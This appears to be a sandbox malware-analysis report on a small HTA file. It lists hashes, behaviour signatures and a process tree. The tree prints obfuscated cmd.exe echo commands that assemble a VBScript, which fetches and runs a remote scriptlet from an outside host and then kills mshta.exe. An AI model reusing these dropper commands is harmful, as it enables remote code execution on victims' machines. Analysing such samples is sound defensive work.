Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 09:23
Static task
static1
Behavioral task
behavioral1
Sample
test.hta
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
test.hta
Resource
win10v2004-20240802-en
General
-
Target
test.hta
-
Size
147B
-
MD5
0144b746edf817419d3fe42b0c50fe92
-
SHA1
f469ffccdf5213f4be17608d2b44d738a604b807
-
SHA256
7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306
-
SHA512
da5447e4ea8313b7cfdc5bb7c3dffe8c21cf2ae5b07c653f0abd125415647f71330c84502f5a0eafdbd7b1a465d0de103ed9598e9183d6587f08299d0df683a2
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2144 mshta.exe 7 2144 mshta.exe 9 2144 mshta.exe 11 2300 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Kills process with taskkill 1 IoCs
pid Process 1448 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1448 taskkill.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 2144 wrote to memory of 3028 2144 mshta.exe 32 PID 2144 wrote to memory of 3028 2144 mshta.exe 32 PID 2144 wrote to memory of 3028 2144 mshta.exe 32 PID 2144 wrote to memory of 3028 2144 mshta.exe 32 PID 2144 wrote to memory of 2016 2144 mshta.exe 34 PID 2144 wrote to memory of 2016 2144 mshta.exe 34 PID 2144 wrote to memory of 2016 2144 mshta.exe 34 PID 2144 wrote to memory of 2016 2144 mshta.exe 34 PID 2016 wrote to memory of 2768 2016 cmd.exe 36 PID 2016 wrote to memory of 2768 2016 cmd.exe 36 PID 2016 wrote to memory of 2768 2016 cmd.exe 36 PID 2016 wrote to memory of 2768 2016 cmd.exe 36 PID 2016 wrote to memory of 2892 2016 cmd.exe 37 PID 2016 wrote to memory of 2892 2016 cmd.exe 37 PID 2016 wrote to memory of 2892 2016 cmd.exe 37 PID 2016 wrote to memory of 2892 2016 cmd.exe 37 PID 2016 wrote to memory of 2820 2016 cmd.exe 38 PID 2016 wrote to memory of 2820 2016 cmd.exe 38 PID 2016 wrote to memory of 2820 2016 cmd.exe 38 PID 2016 wrote to memory of 2820 2016 cmd.exe 38 PID 2016 wrote to memory of 328 2016 cmd.exe 39 PID 2016 wrote to memory of 328 2016 cmd.exe 39 PID 2016 wrote to memory of 328 2016 cmd.exe 39 PID 2016 wrote to memory of 328 2016 cmd.exe 39 PID 2144 wrote to memory of 2772 2144 mshta.exe 40 PID 2144 wrote to memory of 2772 2144 mshta.exe 40 PID 2144 wrote to memory of 2772 2144 mshta.exe 40 PID 2144 wrote to memory of 2772 2144 mshta.exe 40 PID 2144 wrote to memory of 2616 2144 mshta.exe 42 PID 2144 wrote to memory of 2616 2144 mshta.exe 42 PID 2144 wrote to memory of 2616 2144 mshta.exe 42 PID 2144 wrote to memory of 2616 2144 mshta.exe 42 PID 2616 wrote to memory of 2300 2616 cmd.exe 44 PID 2616 wrote to memory of 2300 2616 cmd.exe 44 PID 2616 wrote to memory of 2300 2616 cmd.exe 44 PID 2616 wrote to memory of 2300 2616 cmd.exe 44 PID 2300 wrote to memory of 1448 2300 WScript.exe 45 PID 2300 wrote to memory of 1448 2300 WScript.exe 45 PID 2300 wrote to memory of 1448 2300 WScript.exe 45 PID 2300 wrote to memory of 1448 2300 WScript.exe 45
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\test.hta"1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c "echo WLzi1c22="ri">C:\Users\Public\vvcH43.vbs&&echo IZ4u450="tp">>C:\Users\Public\vvcH43.vbs&&echo hMJQ6C71=".":OduoBTg12="sC" ^& WLzi1c22 ^& "pt:ht" ^& IZ4u450 ^& "s://">>C:\Users\Public\vvcH43.vbs"2⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OduoBTg12^=OduoBTg12 ^& ^"43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1^":GetO^">>C:\Users\Public\\vvcH43.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\vvcH43.vbs2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="OduoBTg12=OduoBTg12 & "43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1":GetO" 1>>C:\Users\Public\\vvcH43.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\vvcH43.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\vvcH43.vbs&&echo OduoBTg12)>>C:\Users\Public\\vvcH43.vbs"2⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\vvcH43.vbs2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\vvcH43.vbs"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM mshta.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
504B
MD598df72bb54091099af3a2120b9f6786a
SHA17c629a82e6043390a067890565cafbfb6d6feb04
SHA256565456ad44f24835fc8b4291cd293c15b5816bf3953221bf43439bb8d8c243ba
SHA512e674e62a32f1ef57de54e9248a62a520827d005278e7f376d460ad76c17a989523fb351022def512f801e8bbc3c8d33882277d5091f5b27abbccda208e61ccb3
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\04788E6207035207B8930FC2CDD3C940
Filesize554B
MD5657c8ac147a92f54cd4f0f1997accab0
SHA19b46849fadf27c222840e98aa8e8e9883d6d6c6f
SHA25665b8b1a1dd569e7763c15cd8f3f6478eb61dcb0c0ad3cc1ec4ff4bf4b38f5afe
SHA5124f2ffe225a14a4d67cf5216795dcd4af878d5c247e467b53729b3a273300177d224c68be0283d3b580d39b38dcbb64bf35cae24e6661b10e5c8c25559e10f3d2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD57201e109a2fc6dda1db0df301876a8db
SHA1e1655d367b6e682195404a75214428cefe565c6e
SHA2567c09aaa5ce46c82912bbb63b5a58f7902b935a260cf512c23a7eecd54ddf7255
SHA5123e6d6e6f336db068ea2897c0cc4f14c4a0857eb90d38b9b18c286d3ed27ac505f6f31433ada59d2456c658711040db2c1729a191d0c091303bb3f84bc6a5e3c0
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
98B
MD50cd354827105e75b556094e7de26cbb7
SHA14e51cd87dcc34fbc2eef24627bfb3ab79c9e2b72
SHA256c999dc13194bdb0f517cbee4431c655761a2a96de29755e6f9f63de7931d5707
SHA512958410f2173fd08adb726397194212f145aa2e8e3d13ae50c9d2968f29177202979aac106bb2651505a91e638947c56fc85fa11adda8e22a8c440ccf063e55fe
-
Filesize
238B
MD5e2a22af70bf4b9205ed04bc63fe04bc7
SHA1e6cb55d932cf06de83495859e6e479d0dfc2b62a
SHA256acdbdd62510404a1e90793bdb71adad7ac95e98b96b4a6122bcb9f8daaa1c8b9
SHA51294e44876f80f293f5290c3a0333764e7f7c2e1334aafbc42e6b41db07d6d7b67aba1fface70840f1655c52774fef4b0d55948d7667f712cce4567d056a4fd7f9
-
Filesize
241B
MD530b71cb46c0a264fbc232d429bc67ead
SHA164ea1a1778efa0a8dc5bef94af04b9b40b0856ea
SHA2562b9ef78793c3383fa2c28fa2b4c2ddf2bbb8237b916c72007de97df31045db49
SHA51207f40ae25a0ea15fede16e368419187d78ad98edf5d0637e9a0b9ce29181df072c0d3648b8e99dcb81a5809180df1a22c25c7ec04e82c7c6da89c0f675e9a1d9
-
Filesize
253B
MD55df54ea4c54de9e8ad092eeac6026f9f
SHA1eb6456597a1517df01a163393c660de6ff7206da
SHA2569ce80b592750d0f78f35ac4215c1925ca6ee3161a9e4aa257a1cf0228952e3d5
SHA512fe7f49ff04578bb209a39d84ef4530d7fe31cbdd70405d6c43eb9a571187e28ae7547843add6131ea9b24f469d02b3a884dff6d7a43e0b0a0cd819fc40c74fc3